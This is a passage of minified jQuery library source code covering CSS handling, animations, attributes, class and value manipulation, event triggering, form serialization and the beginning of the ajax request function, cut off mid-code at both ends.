r,i,o,a,s=e.style;return(n=n||$e(e))&&(""!==(a=n.getPropertyValue(t)||n[t])||w.contains(e.ownerDocument,e)||(a=w.style(e,t)),!h.pixelBoxStyles()&&We.test(a)&&Be.test(t)&&(r=s.width,i=s.minWidth,o=s.maxWidth,s.minWidth=s.maxWidth=s.width=a,a=n.width,s.width=r,s.minWidth=i,s.maxWidth=o)),void 0!==a?a+"":a}function _e(e,t){return{get:function(){if(!e())return(this.get=t).apply(this,arguments);delete this.get}}}var ze=/^(none|table(?!-c[ea]).+)/,Xe=/^--/,Ue={position:"absolute",visibility:"hidden",display:"block"},Ve={letterSpacing:"0",fontWeight:"400"},Ge=["Webkit","Moz","ms"],Ye=r.createElement("div").style;function Qe(e){if(e in Ye)return e;var t=e[0].toUpperCase()+e.slice(1),n=Ge.length;while(n--)if((e=Ge[n]+t)in Ye)return e}function Je(e){var t=w.cssProps[e];return t||(t=w.cssProps[e]=Qe(e)||e),t}function Ke(e,t,n){var r=ie.exec(t);return r?Math.max(0,r[2]-(n||0))+(r[3]||"px"):t}function Ze(e,t,n,r,i,o){var a="width"===t?1:0,s=0,u=0;if(n===(r?"border":"content"))return 0;for(;a<4;a+=2)"margin"===n&&(u+=w.css(e,n+oe[a],!0,i)),r?("content"===n&&(u-=w.css(e,"padding"+oe[a],!0,i)),"margin"!==n&&(u-=w.css(e,"border"+oe[a]+"Width",!0,i))):(u+=w.css(e,"padding"+oe[a],!0,i),"padding"!==n?u+=w.css(e,"border"+oe[a]+"Width",!0,i):s+=w.css(e,"border"+oe[a]+"Width",!0,i));return!r&&o>=0&&(u+=Math.max(0,Math.ceil(e["offset"+t[0].toUpperCase()+t.slice(1)]-o-u-s-.5))),u}function et(e,t,n){var r=$e(e),i=Fe(e,t,r),o="border-box"===w.css(e,"boxSizing",!1,r),a=o;if(We.test(i)){if(!n)return i;i="auto"}return a=a&&(h.boxSizingReliable()||i===e.style[t]),("auto"===i||!parseFloat(i)&&"inline"===w.css(e,"display",!1,r))&&(i=e["offset"+t[0].toUpperCase()+t.slice(1)],a=!0),(i=parseFloat(i)||0)+Ze(e,t,n||(o?"border":"content"),a,r,i)+"px"}w.extend({cssHooks:{opacity:{get:function(e,t){if(t){var n=Fe(e,"opacity");return""===n?"1":n}}}},cssNumber:{animationIterationCount:!0,columnCount:!0,fillOpacity:!0,flexGrow:!0,flexShrink:!0,fontWeight:!0,lineHeight:!0,opacity:!0,order:!0,orphans:!0,widows:!0,zIndex:!0,zoom:!0},cssProps:{},style:function(e,t,n,r){if(e&&3!==e.nodeType&&8!==e.nodeType&&e.style){var i,o,a,s=G(t),u=Xe.test(t),l=e.style;if(u||(t=Je(s)),a=w.cssHooks[t]||w.cssHooks[s],void 0===n)return a&&"get"in a&&void 0!==(i=a.get(e,!1,r))?i:l[t];"string"==(o=typeof n)&&(i=ie.exec(n))&&i[1]&&(n=ue(e,t,i),o="number"),null!=n&&n===n&&("number"===o&&(n+=i&&i[3]||(w.cssNumber[s]?"":"px")),h.clearCloneStyle||""!==n||0!==t.indexOf("background")||(l[t]="inherit"),a&&"set"in a&&void 0===(n=a.set(e,n,r))||(u?l.setProperty(t,n):l[t]=n))}},css:function(e,t,n,r){var i,o,a,s=G(t);return Xe.test(t)||(t=Je(s)),(a=w.cssHooks[t]||w.cssHooks[s])&&"get"in a&&(i=a.get(e,!0,n)),void 0===i&&(i=Fe(e,t,r)),"normal"===i&&t in Ve&&(i=Ve[t]),""===n||n?(o=parseFloat(i),!0===n||isFinite(o)?o||0:i):i}}),w.each(["height","width"],function(e,t){w.cssHooks[t]={get:function(e,n,r){if(n)return!ze.test(w.css(e,"display"))||e.getClientRects().length&&e.getBoundingClientRect().width?et(e,t,r):se(e,Ue,function(){return et(e,t,r)})},set:function(e,n,r){var i,o=$e(e),a="border-box"===w.css(e,"boxSizing",!1,o),s=r&&Ze(e,t,r,a,o);return a&&h.scrollboxSize()===o.position&&(s-=Math.ceil(e["offset"+t[0].toUpperCase()+t.slice(1)]-parseFloat(o[t])-Ze(e,t,"border",!1,o)-.5)),s&&(i=ie.exec(n))&&"px"!==(i[3]||"px")&&(e.style[t]=n,n=w.css(e,t)),Ke(e,n,s)}}}),w.cssHooks.marginLeft=_e(h.reliableMarginLeft,function(e,t){if(t)return(parseFloat(Fe(e,"marginLeft"))||e.getBoundingClientRect().left-se(e,{marginLeft:0},function(){return e.getBoundingClientRect().left}))+"px"}),w.each({margin:"",padding:"",border:"Width"},function(e,t){w.cssHooks[e+t]={expand:function(n){for(var r=0,i={},o="string"==typeof n?n.split(" "):[n];r<4;r++)i[e+oe[r]+t]=o[r]||o[r-2]||o[0];return i}},"margin"!==e&&(w.cssHooks[e+t].set=Ke)}),w.fn.extend({css:function(e,t){return z(this,function(e,t,n){var r,i,o={},a=0;if(Array.isArray(t)){for(r=$e(e),i=t.length;a<i;a++)o[t[a]]=w.css(e,t[a],!1,r);return o}return void 0!==n?w.style(e,t,n):w.css(e,t)},e,t,arguments.length>1)}});function tt(e,t,n,r,i){return new tt.prototype.init(e,t,n,r,i)}w.Tween=tt,tt.prototype={constructor:tt,init:function(e,t,n,r,i,o){this.elem=e,this.prop=n,this.easing=i||w.easing._default,this.options=t,this.start=this.now=this.cur(),this.end=r,this.unit=o||(w.cssNumber[n]?"":"px")},cur:function(){var e=tt.propHooks[this.prop];return e&&e.get?e.get(this):tt.propHooks._default.get(this)},run:function(e){var t,n=tt.propHooks[this.prop];return this.options.duration?this.pos=t=w.easing[this.easing](e,this.options.duration*e,0,1,this.options.duration):this.pos=t=e,this.now=(this.end-this.start)*t+this.start,this.options.step&&this.options.step.call(this.elem,this.now,this),n&&n.set?n.set(this):tt.propHooks._default.set(this),this}},tt.prototype.init.prototype=tt.prototype,tt.propHooks={_default:{get:function(e){var t;return 1!==e.elem.nodeType||null!=e.elem[e.prop]&&null==e.elem.style[e.prop]?e.elem[e.prop]:(t=w.css(e.elem,e.prop,""))&&"auto"!==t?t:0},set:function(e){w.fx.step[e.prop]?w.fx.step[e.prop](e):1!==e.elem.nodeType||null==e.elem.style[w.cssProps[e.prop]]&&!w.cssHooks[e.prop]?e.elem[e.prop]=e.now:w.style(e.elem,e.prop,e.now+e.unit)}}},tt.propHooks.scrollTop=tt.propHooks.scrollLeft={set:function(e){e.elem.nodeType&&e.elem.parentNode&&(e.elem[e.prop]=e.now)}},w.easing={linear:function(e){return e},swing:function(e){return.5-Math.cos(e*Math.PI)/2},_default:"swing"},w.fx=tt.prototype.init,w.fx.step={};var nt,rt,it=/^(?:toggle|show|hide)$/,ot=/queueHooks$/;function at(){rt&&(!1===r.hidden&&e.requestAnimationFrame?e.requestAnimationFrame(at):e.setTimeout(at,w.fx.interval),w.fx.tick())}function st(){return e.setTimeout(function(){nt=void 0}),nt=Date.now()}function ut(e,t){var n,r=0,i={height:e};for(t=t?1:0;r<4;r+=2-t)i["margin"+(n=oe[r])]=i["padding"+n]=e;return t&&(i.opacity=i.width=e),i}function lt(e,t,n){for(var r,i=(pt.tweeners[t]||[]).concat(pt.tweeners["*"]),o=0,a=i.length;o<a;o++)if(r=i[o].call(n,t,e))return r}function ct(e,t,n){var r,i,o,a,s,u,l,c,f="width"in t||"height"in t,p=this,d={},h=e.style,g=e.nodeType&&ae(e),y=J.get(e,"fxshow");n.queue||(null==(a=w._queueHooks(e,"fx")).unqueued&&(a.unqueued=0,s=a.empty.fire,a.empty.fire=function(){a.unqueued||s()}),a.unqueued++,p.always(function(){p.always(function(){a.unqueued--,w.queue(e,"fx").length||a.empty.fire()})}));for(r in t)if(i=t[r],it.test(i)){if(delete t[r],o=o||"toggle"===i,i===(g?"hide":"show")){if("show"!==i||!y||void 0===y[r])continue;g=!0}d[r]=y&&y[r]||w.style(e,r)}if((u=!w.isEmptyObject(t))||!w.isEmptyObject(d)){f&&1===e.nodeType&&(n.overflow=[h.overflow,h.overflowX,h.overflowY],null==(l=y&&y.display)&&(l=J.get(e,"display")),"none"===(c=w.css(e,"display"))&&(l?c=l:(fe([e],!0),l=e.style.display||l,c=w.css(e,"display"),fe([e]))),("inline"===c||"inline-block"===c&&null!=l)&&"none"===w.css(e,"float")&&(u||(p.done(function(){h.display=l}),null==l&&(c=h.display,l="none"===c?"":c)),h.display="inline-block")),n.overflow&&(h.overflow="hidden",p.always(function(){h.overflow=n.overflow[0],h.overflowX=n.overflow[1],h.overflowY=n.overflow[2]})),u=!1;for(r in d)u||(y?"hidden"in y&&(g=y.hidden):y=J.access(e,"fxshow",{display:l}),o&&(y.hidden=!g),g&&fe([e],!0),p.done(function(){g||fe([e]),J.remove(e,"fxshow");for(r in d)w.style(e,r,d[r])})),u=lt(g?y[r]:0,r,p),r in y||(y[r]=u.start,g&&(u.end=u.start,u.start=0))}}function ft(e,t){var n,r,i,o,a;for(n in e)if(r=G(n),i=t[r],o=e[n],Array.isArray(o)&&(i=o[1],o=e[n]=o[0]),n!==r&&(e[r]=o,delete e[n]),(a=w.cssHooks[r])&&"expand"in a){o=a.expand(o),delete e[r];for(n in o)n in e||(e[n]=o[n],t[n]=i)}else t[r]=i}function pt(e,t,n){var r,i,o=0,a=pt.prefilters.length,s=w.Deferred().always(function(){delete u.elem}),u=function(){if(i)return!1;for(var t=nt||st(),n=Math.max(0,l.startTime+l.duration-t),r=1-(n/l.duration||0),o=0,a=l.tweens.length;o<a;o++)l.tweens[o].run(r);return s.notifyWith(e,[l,r,n]),r<1&&a?n:(a||s.notifyWith(e,[l,1,0]),s.resolveWith(e,[l]),!1)},l=s.promise({elem:e,props:w.extend({},t),opts:w.extend(!0,{specialEasing:{},easing:w.easing._default},n),originalProperties:t,originalOptions:n,startTime:nt||st(),duration:n.duration,tweens:[],createTween:function(t,n){var r=w.Tween(e,l.opts,t,n,l.opts.specialEasing[t]||l.opts.easing);return l.tweens.push(r),r},stop:function(t){var n=0,r=t?l.tweens.length:0;if(i)return this;for(i=!0;n<r;n++)l.tweens[n].run(1);return t?(s.notifyWith(e,[l,1,0]),s.resolveWith(e,[l,t])):s.rejectWith(e,[l,t]),this}}),c=l.props;for(ft(c,l.opts.specialEasing);o<a;o++)if(r=pt.prefilters[o].call(l,e,c,l.opts))return g(r.stop)&&(w._queueHooks(l.elem,l.opts.queue).stop=r.stop.bind(r)),r;return w.map(c,lt,l),g(l.opts.start)&&l.opts.start.call(e,l),l.progress(l.opts.progress).done(l.opts.done,l.opts.complete).fail(l.opts.fail).always(l.opts.always),w.fx.timer(w.extend(u,{elem:e,anim:l,queue:l.opts.queue})),l}w.Animation=w.extend(pt,{tweeners:{"*":[function(e,t){var n=this.createTween(e,t);return ue(n.elem,e,ie.exec(t),n),n}]},tweener:function(e,t){g(e)?(t=e,e=["*"]):e=e.match(M);for(var n,r=0,i=e.length;r<i;r++)n=e[r],pt.tweeners[n]=pt.tweeners[n]||[],pt.tweeners[n].unshift(t)},prefilters:[ct],prefilter:function(e,t){t?pt.prefilters.unshift(e):pt.prefilters.push(e)}}),w.speed=function(e,t,n){var r=e&&"object"==typeof e?w.extend({},e):{complete:n||!n&&t||g(e)&&e,duration:e,easing:n&&t||t&&!g(t)&&t};return w.fx.off?r.duration=0:"number"!=typeof r.duration&&(r.duration in w.fx.speeds?r.duration=w.fx.speeds[r.duration]:r.duration=w.fx.speeds._default),null!=r.queue&&!0!==r.queue||(r.queue="fx"),r.old=r.complete,r.complete=function(){g(r.old)&&r.old.call(this),r.queue&&w.dequeue(this,r.queue)},r},w.fn.extend({fadeTo:function(e,t,n,r){return this.filter(ae).css("opacity",0).show().end().animate({opacity:t},e,n,r)},animate:function(e,t,n,r){var i=w.isEmptyObject(e),o=w.speed(t,n,r),a=function(){var t=pt(this,w.extend({},e),o);(i||J.get(this,"finish"))&&t.stop(!0)};return a.finish=a,i||!1===o.queue?this.each(a):this.queue(o.queue,a)},stop:function(e,t,n){var r=function(e){var t=e.stop;delete e.stop,t(n)};return"string"!=typeof e&&(n=t,t=e,e=void 0),t&&!1!==e&&this.queue(e||"fx",[]),this.each(function(){var t=!0,i=null!=e&&e+"queueHooks",o=w.timers,a=J.get(this);if(i)a[i]&&a[i].stop&&r(a[i]);else for(i in a)a[i]&&a[i].stop&&ot.test(i)&&r(a[i]);for(i=o.length;i--;)o[i].elem!==this||null!=e&&o[i].queue!==e||(o[i].anim.stop(n),t=!1,o.splice(i,1));!t&&n||w.dequeue(this,e)})},finish:function(e){return!1!==e&&(e=e||"fx"),this.each(function(){var t,n=J.get(this),r=n[e+"queue"],i=n[e+"queueHooks"],o=w.timers,a=r?r.length:0;for(n.finish=!0,w.queue(this,e,[]),i&&i.stop&&i.stop.call(this,!0),t=o.length;t--;)o[t].elem===this&&o[t].queue===e&&(o[t].anim.stop(!0),o.splice(t,1));for(t=0;t<a;t++)r[t]&&r[t].finish&&r[t].finish.call(this);delete n.finish})}}),w.each(["toggle","show","hide"],function(e,t){var n=w.fn[t];w.fn[t]=function(e,r,i){return null==e||"boolean"==typeof e?n.apply(this,arguments):this.animate(ut(t,!0),e,r,i)}}),w.each({slideDown:ut("show"),slideUp:ut("hide"),slideToggle:ut("toggle"),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},function(e,t){w.fn[e]=function(e,n,r){return this.animate(t,e,n,r)}}),w.timers=[],w.fx.tick=function(){var e,t=0,n=w.timers;for(nt=Date.now();t<n.length;t++)(e=n[t])()||n[t]!==e||n.splice(t--,1);n.length||w.fx.stop(),nt=void 0},w.fx.timer=function(e){w.timers.push(e),w.fx.start()},w.fx.interval=13,w.fx.start=function(){rt||(rt=!0,at())},w.fx.stop=function(){rt=null},w.fx.speeds={slow:600,fast:200,_default:400},w.fn.delay=function(t,n){return t=w.fx?w.fx.speeds[t]||t:t,n=n||"fx",this.queue(n,function(n,r){var i=e.setTimeout(n,t);r.stop=function(){e.clearTimeout(i)}})},function(){var e=r.createElement("input"),t=r.createElement("select").appendChild(r.createElement("option"));e.type="checkbox",h.checkOn=""!==e.value,h.optSelected=t.selected,(e=r.createElement("input")).value="t",e.type="radio",h.radioValue="t"===e.value}();var dt,ht=w.expr.attrHandle;w.fn.extend({attr:function(e,t){return z(this,w.attr,e,t,arguments.length>1)},removeAttr:function(e){return this.each(function(){w.removeAttr(this,e)})}}),w.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?w.prop(e,t,n):(1===o&&w.isXMLDoc(e)||(i=w.attrHooks[t.toLowerCase()]||(w.expr.match.bool.test(t)?dt:void 0)),void 0!==n?null===n?void w.removeAttr(e,t):i&&"set"in i&&void 0!==(r=i.set(e,n,t))?r:(e.setAttribute(t,n+""),n):i&&"get"in i&&null!==(r=i.get(e,t))?r:null==(r=w.find.attr(e,t))?void 0:r)},attrHooks:{type:{set:function(e,t){if(!h.radioValue&&"radio"===t&&N(e,"input")){var n=e.value;return e.setAttribute("type",t),n&&(e.value=n),t}}}},removeAttr:function(e,t){var n,r=0,i=t&&t.match(M);if(i&&1===e.nodeType)while(n=i[r++])e.removeAttribute(n)}}),dt={set:function(e,t,n){return!1===t?w.removeAttr(e,n):e.setAttribute(n,n),n}},w.each(w.expr.match.bool.source.match(/\w+/g),function(e,t){var n=ht[t]||w.find.attr;ht[t]=function(e,t,r){var i,o,a=t.toLowerCase();return r||(o=ht[a],ht[a]=i,i=null!=n(e,t,r)?a:null,ht[a]=o),i}});var gt=/^(?:input|select|textarea|button)$/i,yt=/^(?:a|area)$/i;w.fn.extend({prop:function(e,t){return z(this,w.prop,e,t,arguments.length>1)},removeProp:function(e){return this.each(function(){delete this[w.propFix[e]||e]})}}),w.extend({prop:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return 1===o&&w.isXMLDoc(e)||(t=w.propFix[t]||t,i=w.propHooks[t]),void 0!==n?i&&"set"in i&&void 0!==(r=i.set(e,n,t))?r:e[t]=n:i&&"get"in i&&null!==(r=i.get(e,t))?r:e[t]},propHooks:{tabIndex:{get:function(e){var t=w.find.attr(e,"tabindex");return t?parseInt(t,10):gt.test(e.nodeName)||yt.test(e.nodeName)&&e.href?0:-1}}},propFix:{"for":"htmlFor","class":"className"}}),h.optSelected||(w.propHooks.selected={get:function(e){var t=e.parentNode;return t&&t.parentNode&&t.parentNode.selectedIndex,null},set:function(e){var t=e.parentNode;t&&(t.selectedIndex,t.parentNode&&t.parentNode.selectedIndex)}}),w.each(["tabIndex","readOnly","maxLength","cellSpacing","cellPadding","rowSpan","colSpan","useMap","frameBorder","contentEditable"],function(){w.propFix[this.toLowerCase()]=this});function vt(e){return(e.match(M)||[]).join(" ")}function mt(e){return e.getAttribute&&e.getAttribute("class")||""}function xt(e){return Array.isArray(e)?e:"string"==typeof e?e.match(M)||[]:[]}w.fn.extend({addClass:function(e){var t,n,r,i,o,a,s,u=0;if(g(e))return this.each(function(t){w(this).addClass(e.call(this,t,mt(this)))});if((t=xt(e)).length)while(n=this[u++])if(i=mt(n),r=1===n.nodeType&&" "+vt(i)+" "){a=0;while(o=t[a++])r.indexOf(" "+o+" ")<0&&(r+=o+" ");i!==(s=vt(r))&&n.setAttribute("class",s)}return this},removeClass:function(e){var t,n,r,i,o,a,s,u=0;if(g(e))return this.each(function(t){w(this).removeClass(e.call(this,t,mt(this)))});if(!arguments.length)return this.attr("class","");if((t=xt(e)).length)while(n=this[u++])if(i=mt(n),r=1===n.nodeType&&" "+vt(i)+" "){a=0;while(o=t[a++])while(r.indexOf(" "+o+" ")>-1)r=r.replace(" "+o+" "," ");i!==(s=vt(r))&&n.setAttribute("class",s)}return this},toggleClass:function(e,t){var n=typeof e,r="string"===n||Array.isArray(e);return"boolean"==typeof t&&r?t?this.addClass(e):this.removeClass(e):g(e)?this.each(function(n){w(this).toggleClass(e.call(this,n,mt(this),t),t)}):this.each(function(){var t,i,o,a;if(r){i=0,o=w(this),a=xt(e);while(t=a[i++])o.hasClass(t)?o.removeClass(t):o.addClass(t)}else void 0!==e&&"boolean"!==n||((t=mt(this))&&J.set(this,"__className__",t),this.setAttribute&&this.setAttribute("class",t||!1===e?"":J.get(this,"__className__")||""))})},hasClass:function(e){var t,n,r=0;t=" "+e+" ";while(n=this[r++])if(1===n.nodeType&&(" "+vt(mt(n))+" ").indexOf(t)>-1)return!0;return!1}});var bt=/\r/g;w.fn.extend({val:function(e){var t,n,r,i=this[0];{if(arguments.length)return r=g(e),this.each(function(n){var i;1===this.nodeType&&(null==(i=r?e.call(this,n,w(this).val()):e)?i="":"number"==typeof i?i+="":Array.isArray(i)&&(i=w.map(i,function(e){return null==e?"":e+""})),(t=w.valHooks[this.type]||w.valHooks[this.nodeName.toLowerCase()])&&"set"in t&&void 0!==t.set(this,i,"value")||(this.value=i))});if(i)return(t=w.valHooks[i.type]||w.valHooks[i.nodeName.toLowerCase()])&&"get"in t&&void 0!==(n=t.get(i,"value"))?n:"string"==typeof(n=i.value)?n.replace(bt,""):null==n?"":n}}}),w.extend({valHooks:{option:{get:function(e){var t=w.find.attr(e,"value");return null!=t?t:vt(w.text(e))}},select:{get:function(e){var t,n,r,i=e.options,o=e.selectedIndex,a="select-one"===e.type,s=a?null:[],u=a?o+1:i.length;for(r=o<0?u:a?o:0;r<u;r++)if(((n=i[r]).selected||r===o)&&!n.disabled&&(!n.parentNode.disabled||!N(n.parentNode,"optgroup"))){if(t=w(n).val(),a)return t;s.push(t)}return s},set:function(e,t){var n,r,i=e.options,o=w.makeArray(t),a=i.length;while(a--)((r=i[a]).selected=w.inArray(w.valHooks.option.get(r),o)>-1)&&(n=!0);return n||(e.selectedIndex=-1),o}}}}),w.each(["radio","checkbox"],function(){w.valHooks[this]={set:function(e,t){if(Array.isArray(t))return e.checked=w.inArray(w(e).val(),t)>-1}},h.checkOn||(w.valHooks[this].get=function(e){return null===e.getAttribute("value")?"on":e.value})}),h.focusin="onfocusin"in e;var wt=/^(?:focusinfocus|focusoutblur)$/,Tt=function(e){e.stopPropagation()};w.extend(w.event,{trigger:function(t,n,i,o){var a,s,u,l,c,p,d,h,v=[i||r],m=f.call(t,"type")?t.type:t,x=f.call(t,"namespace")?t.namespace.split("."):[];if(s=h=u=i=i||r,3!==i.nodeType&&8!==i.nodeType&&!wt.test(m+w.event.triggered)&&(m.indexOf(".")>-1&&(m=(x=m.split(".")).shift(),x.sort()),c=m.indexOf(":")<0&&"on"+m,t=t[w.expando]?t:new w.Event(m,"object"==typeof t&&t),t.isTrigger=o?2:3,t.namespace=x.join("."),t.rnamespace=t.namespace?new RegExp("(^|\\.)"+x.join("\\.(?:.*\\.|)")+"(\\.|$)"):null,t.result=void 0,t.target||(t.target=i),n=null==n?[t]:w.makeArray(n,[t]),d=w.event.special[m]||{},o||!d.trigger||!1!==d.trigger.apply(i,n))){if(!o&&!d.noBubble&&!y(i)){for(l=d.delegateType||m,wt.test(l+m)||(s=s.parentNode);s;s=s.parentNode)v.push(s),u=s;u===(i.ownerDocument||r)&&v.push(u.defaultView||u.parentWindow||e)}a=0;while((s=v[a++])&&!t.isPropagationStopped())h=s,t.type=a>1?l:d.bindType||m,(p=(J.get(s,"events")||{})[t.type]&&J.get(s,"handle"))&&p.apply(s,n),(p=c&&s[c])&&p.apply&&Y(s)&&(t.result=p.apply(s,n),!1===t.result&&t.preventDefault());return t.type=m,o||t.isDefaultPrevented()||d._default&&!1!==d._default.apply(v.pop(),n)||!Y(i)||c&&g(i[m])&&!y(i)&&((u=i[c])&&(i[c]=null),w.event.triggered=m,t.isPropagationStopped()&&h.addEventListener(m,Tt),i[m](),t.isPropagationStopped()&&h.removeEventListener(m,Tt),w.event.triggered=void 0,u&&(i[c]=u)),t.result}},simulate:function(e,t,n){var r=w.extend(new w.Event,n,{type:e,isSimulated:!0});w.event.trigger(r,null,t)}}),w.fn.extend({trigger:function(e,t){return this.each(function(){w.event.trigger(e,t,this)})},triggerHandler:function(e,t){var n=this[0];if(n)return w.event.trigger(e,t,n,!0)}}),h.focusin||w.each({focus:"focusin",blur:"focusout"},function(e,t){var n=function(e){w.event.simulate(t,e.target,w.event.fix(e))};w.event.special[t]={setup:function(){var r=this.ownerDocument||this,i=J.access(r,t);i||r.addEventListener(e,n,!0),J.access(r,t,(i||0)+1)},teardown:function(){var r=this.ownerDocument||this,i=J.access(r,t)-1;i?J.access(r,t,i):(r.removeEventListener(e,n,!0),J.remove(r,t))}}});var Ct=e.location,Et=Date.now(),kt=/\?/;w.parseXML=function(t){var n;if(!t||"string"!=typeof t)return null;try{n=(new e.DOMParser).parseFromString(t,"text/xml")}catch(e){n=void 0}return n&&!n.getElementsByTagName("parsererror").length||w.error("Invalid XML: "+t),n};var St=/\[\]$/,Dt=/\r?\n/g,Nt=/^(?:submit|button|image|reset|file)$/i,At=/^(?:input|select|textarea|keygen)/i;function jt(e,t,n,r){var i;if(Array.isArray(t))w.each(t,function(t,i){n||St.test(e)?r(e,i):jt(e+"["+("object"==typeof i&&null!=i?t:"")+"]",i,n,r)});else if(n||"object"!==x(t))r(e,t);else for(i in t)jt(e+"["+i+"]",t[i],n,r)}w.param=function(e,t){var n,r=[],i=function(e,t){var n=g(t)?t():t;r[r.length]=encodeURIComponent(e)+"="+encodeURIComponent(null==n?"":n)};if(Array.isArray(e)||e.jquery&&!w.isPlainObject(e))w.each(e,function(){i(this.name,this.value)});else for(n in e)jt(n,e[n],t,i);return r.join("&")},w.fn.extend({serialize:function(){return w.param(this.serializeArray())},serializeArray:function(){return this.map(function(){var e=w.prop(this,"elements");return e?w.makeArray(e):this}).filter(function(){var e=this.type;return this.name&&!w(this).is(":disabled")&&At.test(this.nodeName)&&!Nt.test(e)&&(this.checked||!pe.test(e))}).map(function(e,t){var n=w(this).val();return null==n?null:Array.isArray(n)?w.map(n,function(e){return{name:t.name,value:e.replace(Dt,"\r\n")}}):{name:t.name,value:n.replace(Dt,"\r\n")}}).get()}});var qt=/%20/g,Lt=/#.*$/,Ht=/([?&])_=[^&]*/,Ot=/^(.*?):[ \t]*([^\r\n]*)$/gm,Pt=/^(?:about|app|app-storage|.+-extension|file|res|widget):$/,Mt=/^(?:GET|HEAD)$/,Rt=/^\/\//,It={},Wt={},$t="*/".concat("*"),Bt=r.createElement("a");Bt.href=Ct.href;function Ft(e){return function(t,n){"string"!=typeof t&&(n=t,t="*");var r,i=0,o=t.toLowerCase().match(M)||[];if(g(n))while(r=o[i++])"+"===r[0]?(r=r.slice(1)||"*",(e[r]=e[r]||[]).unshift(n)):(e[r]=e[r]||[]).push(n)}}function _t(e,t,n,r){var i={},o=e===Wt;function a(s){var u;return i[s]=!0,w.each(e[s]||[],function(e,s){var l=s(t,n,r);return"string"!=typeof l||o||i[l]?o?!(u=l):void 0:(t.dataTypes.unshift(l),a(l),!1)}),u}return a(t.dataTypes[0])||!i["*"]&&a("*")}function zt(e,t){var n,r,i=w.ajaxSettings.flatOptions||{};for(n in t)void 0!==t[n]&&((i[n]?e:r||(r={}))[n]=t[n]);return r&&w.extend(!0,e,r),e}function Xt(e,t,n){var r,i,o,a,s=e.contents,u=e.dataTypes;while("*"===u[0])u.shift(),void 0===r&&(r=e.mimeType||t.getResponseHeader("Content-Type"));if(r)for(i in s)if(s[i]&&s[i].test(r)){u.unshift(i);break}if(u[0]in n)o=u[0];else{for(i in n){if(!u[0]||e.converters[i+" "+u[0]]){o=i;break}a||(a=i)}o=o||a}if(o)return o!==u[0]&&u.unshift(o),n[o]}function Ut(e,t,n,r){var i,o,a,s,u,l={},c=e.dataTypes.slice();if(c[1])for(a in e.converters)l[a.toLowerCase()]=e.converters[a];o=c.shift();while(o)if(e.responseFields[o]&&(n[e.responseFields[o]]=t),!u&&r&&e.dataFilter&&(t=e.dataFilter(t,e.dataType)),u=o,o=c.shift())if("*"===o)o=u;else if("*"!==u&&u!==o){if(!(a=l[u+" "+o]||l["* "+o]))for(i in l)if((s=i.split(" "))[1]===o&&(a=l[u+" "+s[0]]||l["* "+s[0]])){!0===a?a=l[i]:!0!==l[i]&&(o=s[0],c.unshift(s[1]));break}if(!0!==a)if(a&&e["throws"])t=a(t);else try{t=a(t)}catch(e){return{state:"parsererror",error:a?e:"No conversion from "+u+" to "+o}}}return{state:"success",data:t}}w.extend({active:0,lastModified:{},etag:{},ajaxSettings:{url:Ct.href,type:"GET",isLocal:Pt.test(Ct.protocol),global:!0,processData:!0,async:!0,contentType:"application/x-www-form-urlencoded; charset=UTF-8",accepts:{"*":$t,text:"text/plain",html:"text/html",xml:"application/xml, text/xml",json:"application/json, text/javascript"},contents:{xml:/\bxml\b/,html:/\bhtml/,json:/\bjson\b/},responseFields:{xml:"responseXML",text:"responseText",json:"responseJSON"},converters:{"* text":String,"text html":!0,"text json":JSON.parse,"text xml":w.parseXML},flatOptions:{url:!0,context:!0}},ajaxSetup:function(e,t){return t?zt(zt(e,w.ajaxSettings),t):zt(w.ajaxSettings,e)},ajaxPrefilter:Ft(It),ajaxTransport:Ft(Wt),ajax:function(t,n){"object"==typeof t&&(n=t,t=void 0),n=n||{};var i,o,a,s,u,l,c,f,p,d,h=w.ajaxSetup({},n),g=h.context||h,y=h.context&&(g.nodeType||g.jquery)?w(g):w.event,v=w.Deferred(),m=w.Callbacks("once memory"),x=h.statusCode||{},b={},T={},C="canceled",E={readyState:0,getResponseHeader:function(e){var t;if(c){if(!s){s={};while(t=Ot.exec(a))s[t[1].toLowerCase()]=t[2]}t=s[e.toLowerCase()]}return null==t?null:t},getAllResponseHeaders:function(){return c?a:null},setRequestHeader:function(e,t){return null==c&&(e=T[e.toLowerCase()]=T[e.toLowerCase()]||e,b[e]=t),this},overrideMimeType:function(e){return null==c&&(h.mimeType=e),this},statusCode:function(e){var t;if(e)if(c)E.always(e[E.status]);else for(t in e)x[t]=[x[t],e[t]];return this},abort:function(e){var t=e||C;return i&&i.abort(t),k(0,t),this}};if(v.promise(E),h.url=((t||h.url||Ct.href)+"").replace(Rt,Ct.protocol+"//"),h.type=n.method||n.type||h.method||h.type,h.dataTypes=(h.dataType||"*").toLowerCase().match(M)||[""],null==h.crossDomain){l=r.createElement("a");try{l.href=h.url,l.href=l.href,h.crossDomain=Bt.protocol+"//"+Bt.host!=l.protocol+"//"+l.host}catch(e){h.crossDomain=!0}}if(h.data&&h.processData&&"string"!=typeof h.data&&(h.data=w.param(h.data,h.traditional)),_t(It,h,n,E),c)return E;(f=w.event&&h.global)&&0==w.active++&&w.event.trigger("ajaxStart"),h.type=h.type.toUpperCase(),h.hasContent=!Mt.test(h.type),o=h.url.replace(Lt,""),h.hasContent?h.data&&h.processData&&0===(h.contentType||"").indexOf("application/x-www-form-urlencoded")&&(h.data=h.data.replace(qt,"+")):(d=h.url.slice(o.length),h.data&&(h.processData||"string"==typeof h.data)&&(o+=(kt.test(o)?"&":"?")+h.data,delete h.data),!1===h.cache&&(o=o.replace(Ht,"$1"),d=(kt.test(o)?"&":"?")+"_="+Et+++d),h.url=o+d),h.ifModified&&(w.lastModified[o]&&E.setRequestHeader("If-Modified-Since",w.lastModified[o]),w.etag[o]&&E.setRequestHeader("If-None-Match",w.etag[o])),(h.data&&h.hasContent&&!1!==h.contentType||n.contentType)&&E.setRequestHeader("Content-Type",h.contentType),E.setRequestHeader("Accept",h.dataTypes[0]&&h.accepts[h.dataTypes[0]]?h.accepts[h.dataTypes[0]]+("*"!==h.dataTypes[0]?", "+$t+"; q=0.01":""):h.accepts["*"]);for(p in h.headers)E.setRequestHeader(p,h.headers[p]);if(h.beforeSend&&(!1===h.beforeSend.call(g,E,h)||c))return E.abort();if(C="abort",m.add(h.complete),E.done(h.success),E.fail(h.error),i=_t(Wt,h,n,E)){if(E.readyState=1,f&&y.trigger("ajaxSend",[E,h]),c)return 